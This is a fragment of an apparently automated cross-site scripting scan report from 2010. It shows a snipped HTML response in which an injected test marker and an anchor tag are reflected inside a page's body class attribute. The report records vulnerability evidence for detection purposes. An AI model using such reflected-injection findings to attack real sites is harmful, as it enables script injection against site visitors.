<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_test2007c0cd5"><a>ead6bfc60a1"> ...[SNIP]...
Report generated by XSS.CX at Sun Nov 21 20:02:06 CST 2010.